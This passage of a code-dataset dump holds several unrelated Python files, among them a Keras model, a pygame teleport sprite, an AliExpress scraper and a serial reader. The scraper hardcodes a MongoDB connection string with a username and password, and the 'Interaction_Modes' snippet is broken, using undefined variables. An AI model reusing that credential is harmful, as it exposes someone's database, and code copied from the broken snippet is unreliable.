'dev')\nemb_dev = Embedding(max_dev, emb_n)(in_dev)\nin_os = Input(shape=[1], name = 'os')\nemb_os = Embedding(max_os, emb_n)(in_os)\nin_h = Input(shape=[1], name = 'h')\nemb_h = Embedding(max_h, emb_n)(in_h) \nin_d = Input(shape=[1], name = 'd')\nemb_d = Embedding(max_d, emb_n)(in_d) \nin_wd = Input(shape=[1], name = 'wd')\nemb_wd = Embedding(max_wd, emb_n)(in_wd)\n\nin_qty = Input(shape=[1], name = 'qty')\nin_c1 = Input(shape=[1], name = 'c1')\nin_c2 = Input(shape=[1], name = 'c2')\nin_c3 = Input(shape=[1], name = 'c3')\nin_c4 = Input(shape=[1], name = 'c4')\nin_c5 = Input(shape=[1], name = 'c5')\nin_nc = Input(shape=[1], name = 'nc')\nfe = concatenate([(emb_app), (emb_ch), 
(emb_dev), (emb_os), (emb_h), \n (emb_d), (emb_wd)])\ns_dout = SpatialDropout1D(0.2)(fe)\nconv = Conv1D(100, kernel_size=4, strides=1, padding='same')(s_dout)\nconcat = concatenate([Flatten()(s_dout), Flatten()(conv), (in_nc), (in_qty), (in_c1), (in_c2), (in_c3),\n (in_c4), (in_c5)])\nx = Dropout(0.2)(Dense(dense_n,activation='relu')(concat))\nx = Dropout(0.2)(Dense(dense_n,activation='relu')(x))\noutp = Dense(1,activation='sigmoid')(x)\nmodel = Model(inputs=[in_app,in_ch,in_dev,in_os,in_h,in_d,in_wd,in_qty,in_c1,in_c2,in_c3,in_c4,in_c5,in_nc], outputs=outp)\n\nbatch_size = 50000\nepochs = 2\nexp_decay = lambda init, fin, steps: (init/fin)**(1/(steps-1)) - 1\nsteps = int(len(list(train_df)[0]) / batch_size) * epochs\nlr_init, lr_fin = 0.002, 0.0002\nlr_decay = exp_decay(lr_init, lr_fin, steps)\noptimizer_adam = Adam(lr=0.002, decay=lr_decay)\nmodel.compile(loss='binary_crossentropy',optimizer=optimizer_adam,metrics=['accuracy'])\n\nmodel.summary()\n\nclass_weight = {0:.01,1:.99} # magic\nmodel.fit(train_df, y_train, batch_size=batch_size, epochs=2, class_weight=class_weight,\n shuffle=True, verbose=2)\ndel train_df, y_train, y_val; gc.collect()\nmodel.save_weights('imbalanced_data.h5')\n\nsub = pd.DataFrame()\nsub['click_id'] = test_df['click_id'].astype('int')\ntest_df.drop(['click_id', 'click_time','ip','is_attributed'],1,inplace=True)\ntest_df = get_keras_data(test_df)\n\nprint(\"predicting....\")\nsub['is_attributed'] = model.predict(test_df, batch_size=batch_size, verbose=2).reshape(-1)\ndel test_df; gc.collect()\nprint(\"writing....\")\nsub.to_csv('nn2_sub.csv.gz', float_format='%.8f',index=False,compression='gzip')\n\ndel sub\ngc.collect()\n\nres_val = pd.DataFrame()\nres_val['is_attributed'] = model.predict(val_df, batch_size=batch_size, verbose=2).reshape(-1)\ndel val_df\ngc.collect()\nres_val.to_csv('nn2_val.csv.gz', 
float_format='%.8f',index=False,compression='gzip')\nprint(\"done\")\n","sub_path":"scripts/alexnn_dense.py","file_name":"alexnn_dense.py","file_ext":"py","file_size_in_byte":9915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"651851575","text":"import pygame\n\nfrom camera import *\n\ndef RelRect(x,y,w,h,camera):\n return pygame.Rect(x-camera.rect.x, y-camera.rect.y, w, h)\n\nclass teleport(pygame.sprite.Sprite):\n def __init__(self,game):\n super().__init__()\n #초기화\n self.game=game\n self.ready=False\n self.player_state=0\n\n\n #텔레포트 확인\n #한 class당 본인 sprite 하나라서 사용자 좌표 받아서 sprite 정함\n def sprite_def(self,game,player):\n #아래 빨간색\n if player.rect.x>=2500 and player.rect.x<=3000 and player.rect.y>=1100 and player.rect.y<=1500:\n self.image=pygame.image.load(\"tile/red_up.png\").convert_alpha()\n self.image=pygame.transform.scale(self.image,(40,80))\n\n self.rect=self.image.get_rect()\n self.mask=pygame.mask.from_surface(self.image)\n\n self.rect.x=2630\n self.rect.y=1160\n\n self.ready=True\n self.player_state=1\n\n #위 빨간색\n if player.rect.x>=1900 and player.rect.x<=2200 and player.rect.y>=800 and player.rect.y<=900:\n self.image=pygame.image.load(\"tile/red_up.png\").convert_alpha()\n self.image=pygame.transform.scale(self.image,(40,80))\n\n self.rect=self.image.get_rect()\n self.mask=pygame.mask.from_surface(self.image)\n\n self.rect.x=2000\n self.rect.y=840\n\n self.ready=True\n self.player_state=2\n\n #위 분홍색\n if player.rect.x>=1600 and player.rect.x<=1900 and player.rect.y>=800 and player.rect.y<=1050:\n self.image=pygame.image.load(\"tile/pink_neon_up.png\").convert_alpha()\n self.image=pygame.transform.scale(self.image,(40,80))\n\n self.rect=self.image.get_rect()\n self.mask=pygame.mask.from_surface(self.image)\n\n self.rect.x=1880\n self.rect.y=850\n\n self.ready=True\n self.player_state=3\n\n #아래 분홍색\n if player.rect.x>=1600 and player.rect.x<=1900 and player.rect.y>=1200 and player.rect.y<=1400:\n 
self.image=pygame.image.load(\"tile/pink_neon.png\").convert_alpha()\n self.image=pygame.transform.scale(self.image,(80,40))\n\n self.rect=self.image.get_rect()\n self.mask=pygame.mask.from_surface(self.image)\n\n self.rect.x=1680\n self.rect.y=1415\n\n self.ready=True\n self.player_state=4\n\n #지하 파란색\n if player.rect.x>=1600 and player.rect.x<=1900 and player.rect.y>=1100 and player.rect.y<=1200:\n self.image=pygame.image.load(\"tile/blue_neon_down.png\").convert_alpha()\n self.image=pygame.transform.scale(self.image,(80,40))\n\n self.rect=self.image.get_rect()\n self.mask=pygame.mask.from_surface(self.image)\n\n self.rect.x=1680\n self.rect.y=1130\n\n self.ready=True\n self.player_state=5\n\n #위에 파란색\n if player.rect.x>=1700 and player.rect.x<=1845 and player.rect.y<=240:\n self.image=pygame.image.load(\"tile/blue_up.png\").convert_alpha()\n self.image=pygame.transform.scale(self.image,(40,80))\n\n self.rect=self.image.get_rect()\n self.mask=pygame.mask.from_surface(self.image)\n\n self.rect.x=1800\n self.rect.y=110\n\n self.ready=True\n self.player_state=6\n\n #초록색\n if player.rect.x>=2670 and player.rect.x<=3500 and player.rect.y>=500 and player.rect.y<=650:\n self.image=pygame.image.load(\"tile/green_neon.png\").convert_alpha()\n self.image=pygame.transform.scale(self.image,(80,40))\n\n self.rect=self.image.get_rect()\n self.mask=pygame.mask.from_surface(self.image)\n\n self.rect.x=3400\n self.rect.y=530\n\n self.ready=True\n self.player_state=7\n\n if player.rect.x>=3280 and player.rect.x<=3450 and player.rect.y>=600 and player.rect.y<=720:\n self.image=pygame.image.load(\"tile/pink_neon_up.png\").convert_alpha()\n self.image=pygame.transform.scale(self.image,(40,80))\n\n self.rect=self.image.get_rect()\n self.mask=pygame.mask.from_surface(self.image)\n\n self.rect.x=3440\n self.rect.y=690\n\n self.ready=True\n self.player_state=8\n\n if player.rect.x>=0 and player.rect.x<=70 and player.rect.y<=300 and player.rect.y>=200:\n 
self.image=pygame.image.load(\"tile/pink_neon_up.png\").convert_alpha()\n self.image=pygame.transform.scale(self.image,(40,80))\n\n self.rect=self.image.get_rect()\n self.mask=pygame.mask.from_surface(self.image)\n\n self.rect.x=40\n self.rect.y=230\n\n self.ready=True\n self.player_state=9\n\n\n def collide_detect(self,game):\n hits=pygame.sprite.spritecollide(self,game.player_sprite,False,pygame.sprite.collide_mask)\n\n if hits:\n #아래 빨간색으로 들어가면 위 빨간색으로 나옴\n if self.player_state is 1 and game.player.direction is \"right\":\n game.player.rect.x=2010\n game.player.rect.y=840\n game.player.direction=\"left\"\n #위쪽 빨간색으로 들어가면 아래 빨간색으로 나옴\n if self.player_state is 2 and game.player.direction is \"left\":\n game.player.rect.x=2630\n game.player.rect.y=1190\n game.player.direction=\"right\"\n #위 분홍색으로 들어가면 아래 분홍색으로 나옴\n if game.background_.ispink is True and self.player_state is 3 and game.player.direction is \"right\":\n game.player.rect.x=1680\n game.player.rect.y=1400\n game.player.movy-=30\n #아래 분홍으로 들어가면 위쪽 분홍색으로 나옴\n if self.player_state is 4:\n game.player.rect.x=1860\n game.player.rect.y=850\n game.player.direction=\"left\"\n #지하 파란색으로 들어가면 위쪽 파란색으로 나옴\n if self.player_state is 5:\n game.player.rect.x=1795\n game.player.rect.y=110\n game.player.direction=\"left\"\n #위쪽 파란색으로 들어가면 지하 파란색으로 나옴\n if self.player_state is 6 and game.player.direction is \"right\":\n game.player.rect.x=1680\n game.player.rect.y=1135\n game.player.movy+=30\n if self.player_state is 7:\n game.player.movy-=27\n if self.player_state is 8 and game.player.direction is \"right\":\n game.player.rect.x=40\n game.player.rect.y=230\n game.player.direction=\"right\"\n if self.player_state is 9 and game.player.direction is \"left\":\n game.player.rect.x=3440\n game.player.rect.y=695\n game.player.direction=\"left\"\n\n\nclass box(pygame.sprite.Sprite):\n def __init__(self):\n super().__init__()\n #초기화\n\n self.image=pygame.image.load(\"tile/platform_tile_023.png\").convert_alpha()\n 
self.image=pygame.transform.scale(self.image,(40,40))\n\n self.rect=self.image.get_rect()\n self.mask=pygame.mask.from_surface(self.image)\n\n self.rect.x=1880\n self.rect.y=960\n\n def collide_detect(self,game,background):\n hits=pygame.sprite.spritecollide(self,game.player_sprite,False,pygame.sprite.collide_mask)\n if hits:\n background.ispink=True\n","sub_path":"teleport.py","file_name":"teleport.py","file_ext":"py","file_size_in_byte":7701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"83509798","text":"# -*- coding: utf-8 -*-\n\nimport operator\nimport functools\n\nfrom projecteuler import mymaths\n\n\ndef rad(n):\n if n == 1:\n return 1\n else:\n return functools.reduce(operator.mul, mymaths.numdivsprimes(n), 1)\n\n\ndef result():\n LIMITE = 100000\n E_NUMERO = 10000\n tupla = []\n radlist = []\n for n in range(1, LIMITE + 1):\n # if n % 1000 == 0:\n # print n\n rd = rad(n)\n tupla.append(n)\n tupla.append(rd)\n radlist.append(tupla)\n tupla = []\n\n radlist.sort(key=operator.itemgetter(1))\n # print \"Resultado para 0124: \", radlist[E_NUMERO - 1][0]\n return radlist[E_NUMERO - 1][0]\n","sub_path":"projecteuler/problems/d0100/p0124/r0124.py","file_name":"r0124.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"224718593","text":"import os\n\n\ndef go_in_folder(path_to_go, file_count, file_size):\n for i_elem in os.listdir(path_to_go):\n if os.path.isfile(os.path.join(path_to_go, i_elem)):\n file_count += 1\n file_size += os.path.getsize(os.path.join(path_to_go, i_elem))\n\n elif os.path.isdir(os.path.join(path_to_go, i_elem)):\n file_count, file_size = go_in_folder(os.path.join(path_to_go, i_elem), file_count, file_size)\n return file_count, file_size\n\n\npath_to_folder = '/Users/aguseva/PycharmProjects/iurii_alekhin/Module22'\nsumm, size = go_in_folder(path_to_folder, 0, 0)\n\nprint('Количество 
файлов:', summ, ' Размер, байт:', size)\n\n# зачёт! 🚀\n","sub_path":"Module22/04_files_and_folders/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"355121695","text":"import logging\nimport sys\n\nfrom optparse import make_option, OptionParser\n\nlogging.basicConfig(level=logging.DEBUG)\n\nlogger = logging.getLogger(__name__)\n\n\nclass BaseCommand(object):\n option_list = (\n make_option(\n '-v', '--verbosity', action='store', dest='verbosity', default='1',\n type='choice', choices=['0', '1', '2', '3'],\n help='Verbosity level; 0=minimal output, 1=normal output, 2=verbose output, 3=very verbose output'\n ),\n make_option(\n '--aws_access_key_id', action='store', dest='aws_access_key_id', default=None,\n help='The aws access key id so that we can retrieve jobs from sqs'\n ),\n make_option(\n '--aws_secret_access_key', action='store', dest='aws_secret_access_key',\n default=None,\n help='The aws secret access key so that we can retrieve jobs from sqs'\n ),\n make_option(\n '--queue', action='store', dest='queue', default='pysqes',\n help=\"The name of the SQS queue. The default is pysqes.\"\n ),\n make_option(\n '--config', action='store', dest='config', default=None,\n help=\"The path to the pysqes config module.\"\n ),\n make_option(\n '--configpath', action='store', dest='configpath', default=None,\n help=\"The directory path to the pysqes config module. 
If your config module is not in the PYTHONPATH, then set this option so that it can be appended to sys.path\"\n )\n )\n prog_name = \"pysqes\"\n help = \"\"\n args = \"\"\n\n def usage(self, subcommand):\n usage = '%prog {0} [options] {1}'.format(subcommand, self.args)\n if self.help:\n return '{0}\\n\\n{1}'.format(usage, self.help)\n else:\n return usage\n\n def run_from_argv(self, argv):\n if len(argv) < 2:\n logger.debug(\"You need to specify a command\")\n raise Exception(\"Not enough arguments, missing pysqes command\")\n\n self.execute(argv[0], argv[1])\n\n def run_from_commandline(self, argv):\n argv = sys.argv if argv is None else argv\n logger.info(\"Running with arguments {0}\".format(argv))\n return self.run_from_argv(argv)\n\n def get_parser(self, prog_name, subcommand):\n return OptionParser(\n prog=prog_name,\n usage=self.usage(subcommand),\n option_list=self.option_list\n )\n\n def handle(self):\n raise NotImplementedError('Command subclasses should implement this method')\n","sub_path":"pysqes/bin/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"555486676","text":"from bs4 import BeautifulSoup as soup\nfrom urllib.request import urlopen as uReq\nimport time\nimport sys\nimport copy\nimport json\nimport os\nimport pymongo\nimport datetime\n\n\n\n\n## Things to find\nproduct_id = 1\nproduct_name = 1\ncategory = 0\nrating = 0\nlast_purchase_date = 0\nlast_page_reached = 0\nnum_transactions = 1\ntransaction_list = 0\ndate_scraped = 0 \ntopratedratedsellerboolean = 0\notherrating = 0\npriceofitem = 0\n\n\n#GLOBAL VARIABLES\n#URL_NUMBER = 32995028266\n#URL_NUMBER = 32995023560\n#URL_NUMBER = 32995023311\n#URL_NUMBER = 32995023387\n#EDGE_CASE_URL = 32995023387\n\nMinimumNumberOFOrders = 50\n\nlower_range = int(sys.argv[1])\nupper_range = int(sys.argv[2])\n\n\ndef getRating():\n ratingIndex = feedbackSoup.find('
')\n\tendtitleIndex = page_soup.find('')\n\n\tproductNameReturn = page_soup[numTitleIndex+7:endtitleIndex] \n\t#print(page_soup )\n\treturn productNameReturn\n\n\n\nfor URL_NUMBER in range(lower_range, upper_range):\n \n #print(\"Now going though product: \" +str(URL_NUMBER))\n ################################ Make feedback Soup ############################# START\n start_time = time.time()\n\n\n feedbackURL = 'https://feedback.aliexpress.com/display/productEvaluation.htm?productId='+ str(URL_NUMBER) +'&ownerMemberId=2&type=default&page=1'\n try:\n uClient = uReq(feedbackURL)\n feedbackHTML = uClient.read()\n uClient.close()\n except:\n \tcontinue\n #print(\"this is not good Bad feedback\")\n #continue\n\n feedbackSoup = str(soup(feedbackHTML, \"html.parser\"))\n\n #print(\"feedback page took: %s seconds ---\" % (time.time() - start_time))\n ################################################################################# END\n\n\n\n \n\n ################################ Make Regular Soup ############################# START\n start_time = time.time()\n\n\n url ='https://www.aliexpress.com/item/' + str(URL_NUMBER) +'.html'\n try:\n uClient = uReq(url)\n page_html = uClient.read()\n uClient.close()\n except:\n \tcontinue\n #print(\"this is not good bad Regular URL\")\n \n \n page_soup = str(soup(page_html, \"html.parser\"))\n\n #print(\"Regular page took: %s seconds ---\" % (time.time() - start_time))\n ################################################################################# END\n\n\n\n\t\n pageCheck = isPageEmpty()\n if(pageCheck == -1):\n continue\n\n\n \n #page_html = makeSoup()\n\n\n ######## Find number of transactions ########\n #index = page_soup.find('tradeCount')\n #print(page_soup.find('tradeCount'))\n #print(page_soup[index+12:index+17])\n #print(page_soup.find('item-not-found-image'))\n\n print(\"\\n\")\n\n ######### Find product number ###############\n #productNameIndex = page_soup.find('\"subject\":\"')\n 
#print(page_soup[productNameIndex+11:index-3])\n\n ##################### ########################\n\n ##################### ########################\n\n ##################### ########################\n\n ##################### ########################\n\n ##################### ########################\n\n ##################### ########################\n\n ##################### ########################\n\n ##################### ########################\n\n ##################### ########################\n\n ##################### ########################\n\n ##################### ########################\n\n ##################### ########################\n\n ##################### ########################\n\n ##################### ########################\n\n ##################### ########################\n\n ##################### ########################\n\n\n ##################### ########################\n ##################### ########################\n\n ##################### Formatted output for testing ########################\n rating = getRating()\n #print(\"Rating: \" + rating)\n productNumber = URL_NUMBER\n #print(\"Item ID Number: \"+ str(productNumber))\n numOrders = int(getNumOrders())\n #numOrders = getNumOrders()\n # print(\"Total Number of orders made: \" + numOrders)\n\n if(numOrders<=MinimumNumberOFOrders ):\n \tcontinue\n #print(\"Total Number of orders made: \" + numOrders)\n productName = getProductName()\n #print(productName)\n\n\n # Create dictionary\n dict_product_id_copy = copy.deepcopy(productNumber)\n dict_product_name_copy = copy.deepcopy(productName)\n dict_website_name = \"aliexpress\"\n #dict_category_list = copy.deepcopy(get_category())\n #dict_last_date_purchased = copy.deepcopy(date_list[-1])\n dict_rating = copy.deepcopy(rating)\n dict_date_scraped = datetime.datetime.today()\n #dict_last_page_reached = copy.deepcopy(current_page)\n dict_num_transactions_copy = copy.deepcopy(numOrders)\n #dict_date_list_copy = 
copy.deepcopy(date_list)\n temp_dictionary = {'product_id': dict_product_id_copy, 'product_name': dict_product_name_copy, 'rating': dict_rating, 'num_transactions': dict_num_transactions_copy, 'date_scraped': dict_date_scraped, 'website_name': dict_website_name } \n# temp_dictionary = {'product_id': dict_product_id_copy, 'product_name': dict_product_name_copy, 'category': dict_category_list, \n# \t\t\t\t\t'rating': dict_rating, 'last_purchase_date': dict_last_date_purchased, 'last_page_reached': dict_last_page_reached, \n # \t\t\t\t\t'num_transactions': dict_num_transactions_copy, 'transaction_list': dict_date_list_copy, 'date_scraped': dict_date_scraped\n# } \n #for i in temp_dictionary:\n #print(temp_dictionary[i])\n client = pymongo.MongoClient(\n \"mongodb://allan:Spring2019@firstcluster-shard-00-00-wy2qu.mongodb.net:27017,firstcluster-shard-00-01-wy2qu.mongodb.net:27017,firstcluster-shard-00-02-wy2qu.mongodb.net:27017/test?ssl=true&replicaSet=FirstCluster-shard-0&authSource=admin&retryWrites=true\")\n db = client['test']\n collection_products = db['products']\n query = {'product_id': dict_product_id_copy}\n new_value = {\"$set\": temp_dictionary}\n\n collection_products.update_one(query, new_value, upsert=True)\n #if(collection_products.update_one(query, new_value, upsert=True)):\n #print(\"update_one\")\n\n client.close()\n\n\n # Create URL\n # url = 'https://feedback.aliexpress.com/display/evaluationProductDetailAjaxService.htm?callback=jQuery&productId=' + str(4000591272216) + '&type=default&page=1'\n #url ='https://www.aliexpress.com/item/32995023311.html'\n\n # Make soup as a str so that it can easily be converted to json\n #supper = soup(page_html, \"html.parser\")\n\n #\n #print(url)\n\n\n #mydivs = supper.findAll(\"script\", {\"class\": \"product-reviewer\"})\n #print(str(mydivs))\n 
#print(mydivs)\n\n","sub_path":"AliExpress/AliScraper.py","file_name":"AliScraper.py","file_ext":"py","file_size_in_byte":7382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"263916074","text":"\"\"\"\nCode for assisting in viewing the results.\n\"\"\"\n\nimport matplotlib.pyplot\nimport matplotlib.cm\nimport numpy as np\nimport torch\nimport torchvision.utils\nimport scipy.misc\n\n\nmatplotlib.pyplot.switch_backend('Agg')\n\n\ndef convert_density_maps_to_heatmaps(label, predicted_label):\n \"\"\"\n Converts a label and predicted label density map into their respective heatmap images.\n\n :param label: The label tensor.\n :type label: torch.autograd.Variable\n :param predicted_label: The predicted labels tensor.\n :type predicted_label: torch.autograd.Variable\n :return: The heatmap label tensor and heatmap predicted label tensor.\n :rtype: (torch.autograd.Variable, torch.autograd.Variable)\n \"\"\"\n mappable = matplotlib.cm.ScalarMappable(cmap='inferno')\n label_array = label.numpy()\n predicted_label_array = predicted_label.numpy()\n mappable.set_clim(vmin=min(label_array.min(), predicted_label_array.min()),\n vmax=max(label_array.max(), predicted_label_array.max()))\n resized_label_array = scipy.misc.imresize(label_array, (72, 72), mode='F')\n label_heatmap_array = mappable.to_rgba(resized_label_array).astype(np.float32)\n label_heatmap_tensor = torch.from_numpy(label_heatmap_array[:, :, :3].transpose((2, 0, 1)))\n resized_predicted_label_array = scipy.misc.imresize(predicted_label_array, (72, 72), mode='F')\n predicted_label_heatmap_array = mappable.to_rgba(resized_predicted_label_array).astype(np.float32)\n predicted_label_heatmap_tensor = torch.from_numpy(predicted_label_heatmap_array[:, :, :3].transpose((2, 0, 1)))\n return label_heatmap_tensor, predicted_label_heatmap_tensor\n\n\ndef create_crowd_images_comparison_grid(images, labels, predicted_labels, number_of_images=3):\n \"\"\"\n Creates a grid 
of images from the original images, the true labels, and the predicted labels.\n\n :param images: The original RGB images.\n :type images: torch.autograd.Variable\n :param labels: The labels.\n :type labels: torch.autograd.Variable\n :param predicted_labels: The predicted labels.\n :type predicted_labels: torch.autograd.Variable\n :param number_of_images: The number of (original) images to include in the grid.\n :type number_of_images: int\n :return: The image of the grid of images.\n :rtype: np.ndarray\n \"\"\"\n grid_image_list = []\n for index in range(min(number_of_images, images.size()[0])):\n grid_image_list.append((images[index].data + 1) / 2)\n label_heatmap, predicted_label_heatmap = convert_density_maps_to_heatmaps(labels[index].data,\n predicted_labels[index].data)\n grid_image_list.append(label_heatmap)\n grid_image_list.append(predicted_label_heatmap)\n return torchvision.utils.make_grid(grid_image_list, nrow=number_of_images)\n","sub_path":"viewer.py","file_name":"viewer.py","file_ext":"py","file_size_in_byte":2859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"149140007","text":"class ResidueTypes:\n\tdef __init__(self, inputLetterCode, input3letterCode, inputName):\n\t\tself.letterCode = inputLetterCode\n\t\tself.letterCode3 = input3letterCode\n\t\tself.name = inputName\n\nglobal residueTypes\nresidueTypes = {}\n\nresidueTypes[\"ALANINE\"] = ResidueTypes(\"A\", \"ala\", \"alanine\")\nresidueTypes[\"ARGININE\"] = ResidueTypes(\"R\", \"arg\", \"arginine\")\nresidueTypes[\"ASPARAGINE\"] = ResidueTypes(\"N\", \"asn\", \"asparagine\")\nresidueTypes[\"ASPARTATE\"] = ResidueTypes(\"D\", \"asp\", \"aspartate\")\nresidueTypes[\"CYSTEINE\"] = ResidueTypes(\"C\", \"cys\", \"cysteine\")\nresidueTypes[\"GLUTAMINE\"] = ResidueTypes(\"Q\", \"gln\", \"glutamine\")\nresidueTypes[\"GLUTAMATE\"] = ResidueTypes(\"E\", \"glu\", \"glutamate\")\nresidueTypes[\"GLYCINE\"] = ResidueTypes(\"G\", \"gly\", 
\"glycine\")\nresidueTypes[\"HISTIDINE\"] = ResidueTypes(\"H\", \"his\", \"histidine\")\nresidueTypes[\"ISOLEUCINE\"] = ResidueTypes(\"I\", \"ile\", \"isoleucine\")\nresidueTypes[\"LEUCINE\"] = ResidueTypes(\"L\", \"leu\", \"leucine\")\nresidueTypes[\"LYSINE\"] = ResidueTypes(\"K\", \"lys\", \"lysine\")\nresidueTypes[\"METHIONINE\"] = ResidueTypes(\"M\", \"met\", \"methionine\")\nresidueTypes[\"PHENYLALANINE\"] = ResidueTypes(\"F\", \"phe\", \"phenylalanine\")\nresidueTypes[\"PROLINE\"] = ResidueTypes(\"P\", \"pro\", \"proline\")\nresidueTypes[\"SERINE\"] = ResidueTypes(\"S\", \"ser\", \"serine\")\nresidueTypes[\"THREONINE\"] = ResidueTypes(\"T\", \"thr\", \"threonine\")\nresidueTypes[\"TRYPTOPHAN\"] = ResidueTypes(\"W\", \"trp\", \"tryptophan\")\nresidueTypes[\"TYROSINE\"] = ResidueTypes(\"Y\", \"tyr\", \"tyrosine\")\nresidueTypes[\"VALINE\"] = ResidueTypes(\"V\", \"val\", \"valine\")","sub_path":"example/ResidueTypes.py","file_name":"ResidueTypes.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"55162392","text":"from django.conf.urls import url\nfrom .views import pause_activity, start_activity, education_dell, curses_dell, \\\n ranks_dell, TrainersListView, TrainerDetailView, TrainersByDirectionListView\n\napp_name = 'trainers'\nurlpatterns = [\n url(r'^pause/$', pause_activity, name='pause_activity'),# used without temlate (for view)\n url(r'^start/$', start_activity, name='start_activity'),# used without temlate (for view)\n url(r'^education_dell/$', education_dell, name='education_dell'),# used without temlate (for view)\n url(r'^curses_dell/$', curses_dell, name='curses_dell'),# used without temlate (for view)\n url(r'^cranks_dell/$', ranks_dell, name='ranks_dell'),# used without temlate (for view)\n url(r'^person/(?P[-\\w]+)/$', TrainerDetailView.as_view(), name='viewperson'),\n url(r'^(?P[-\\w]+)/$', TrainersListView.as_view(), name='viewtrainers'),\n 
url(r'^(?P[-\\w]+)/(?P[-\\w]+)/$', TrainersByDirectionListView.as_view(), name='viewdirect'),\n \n]\n","sub_path":"trainers/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"151302950","text":"import json\nimport urllib\nimport time\n\ntry:\n import urllib.request as urllib2\nexcept ImportError:\n import urllib2\n\napp_id = \"YOUR_API_KEY\"\nbase_weather_url = \"https://query.yahooapis.com/v1/public/yql?\"\n\nprint(\"===Welcome on PyWeatherCheck===\")\ntime.sleep(0.3)\nprint()\nprint(\"This application is made by Alvin FREY with the yahoo weather API and Python\")\ntime.sleep(0.3)\nprint(\"Be careful : You need an internet connexion for this app\")\nprint()\n\nlocation = input(\"Enter your location : \")\nunits = input(\"Enter the units for temperature : \")\n\nif units == \"c\" or units == \"celsius\" or units == \"CELSIUS\" or units == \"Celsius\":\n units = \"c\"\nelif units == \"f\" or units == \"fahrenheit\" or units == \"FAHRENHEIT\" or units == \"Fahrenheit\":\n units = \"f\"\nelse:\n print()\n print(\"Please enter a correct units (Celsius or Fahrenheit)\")\n time.sleep(1.5)\n raise SystemExit(0)\n\nbase_woeid = \"http://where.yahooapis.com/v1/places.q('\" + urllib.parse.quote_plus(\n location) + \"')?appid=\" + app_id + \"&format=json\"\nresult_woeid = urllib2.urlopen(base_woeid).read()\nresult_woeid_json = json.loads(result_woeid.decode())\n\ntry:\n woeid = (result_woeid_json['places']['place'][0]['woeid'])\nexcept KeyError:\n print()\n print(\"The city is not found\")\n time.sleep(0.5)\n raise SystemExit(0)\n\nyql_query = \"select * from weather.forecast where woeid=\" + str(woeid) + \" and u='\" + units + \"'\"\nyql_proper_url = base_weather_url + urllib.parse.urlencode({'q': yql_query}) + \"&format=json\"\n\nresult_weather = urllib2.urlopen(yql_proper_url).read()\nresult_weather_json = 
json.loads(result_weather.decode())\n\nprint()\nprint(\"Temperature : \" + result_weather_json['query']['results']['channel']['item']['condition']['temp'] + \" °\" + units)\nprint(\"Conditions : \" + result_weather_json['query']['results']['channel']['item']['condition']['text'])\nprint(\"Wind Speed : \" + result_weather_json['query']['results']['channel']['wind']['speed'] + \" \" + result_weather_json['query']['results']['channel']['units']['speed'])\nprint(\"Atmospheric Pressure : \" + result_weather_json['query']['results']['channel']['atmosphere']['pressure'] + \" \" + result_weather_json['query']['results']['channel']['units']['pressure'])\nprint(\"Weather for Tomorrow : \" + \"Tomorrow the weather will be \" + result_weather_json['query']['results']['channel']['item']['forecast'][1]['text'] + \" .The Temperature of Tomorrow will be between \" + result_weather_json['query']['results']['channel']['item']['forecast'][1]['high'] + \" and \" + result_weather_json['query']['results']['channel']['item']['forecast'][1]['low'] + \" °\" + units)\nprint()\ninput(\"Press Enter to exit\")\n\n\n\n\n","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"352409437","text":"# coding=utf8\nimport torch.nn.functional as F\nimport torch\nimport torch.nn as nn\n\n###### interaction mode:\n###### same\ndef SAME(h):\n g_t = F.max_pool1d(h, h.size(2)).squeeze(2)\n # print(x.size())\n return g_t\n\n###### attend\n\ndef ATTEND(h,x):\n\n avg_pool_x = F.avg_pool2d(x.unsqueeze(1),kernel_size =(3,100),stride=1,padding=(1,0)).squeeze(3)\n avg_pool_x = avg_pool_x.permute(0,2,1)\n alpha = F.softmax(torch.matmul(torch.tanh(h),avg_pool_x),dim=1)\n sum_alpha_h = torch.sum(h*alpha,dim=2) # sum([9, 256, 32]*[9, 256, 1]=[9,256,32]) = [9, 256]\n maxpool_enc1 = F.max_pool1d(h, h.size(2)).squeeze(2) # [9, 256]\n g_t = torch.cat([maxpool_enc1,sum_alpha_h],dim=1) 
#[9, 512]\n return g_t\n\ng_t1 = SAME(out)\ng_t2 = ATTEND(out,emb)\nprint(g_t1.size())\nprint(g_t2.size())\n\n'''compress'''\n\ndef MLP(input_size, common_size):\n\n linear = nn.Sequential(\n nn.Linear(input_size, input_size // 2),\n nn.ReLU(inplace=True),\n nn.Linear(input_size // 2, input_size // 4),\n nn.ReLU(inplace=True),\n nn.Linear(input_size // 4, common_size)\n )\n\n def forward(self, x):\n out = self.linear(x)\n return out\n\nmlp = MLP(512,100)\ng_t = mlp.forward(g_t2)\nprint(g_t.size())","sub_path":"Interaction_Modes.py","file_name":"Interaction_Modes.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"358934256","text":"import serial\nimport time\n\ndef main():\n con=serial.Serial('/dev/ttyACM0', 115200)\n print('connected.')\n while 1:\n str=con.readline() # byte code\n print (str.strip().decode('utf-8')) # decoded string\n\nif __name__ == '__main__':\n 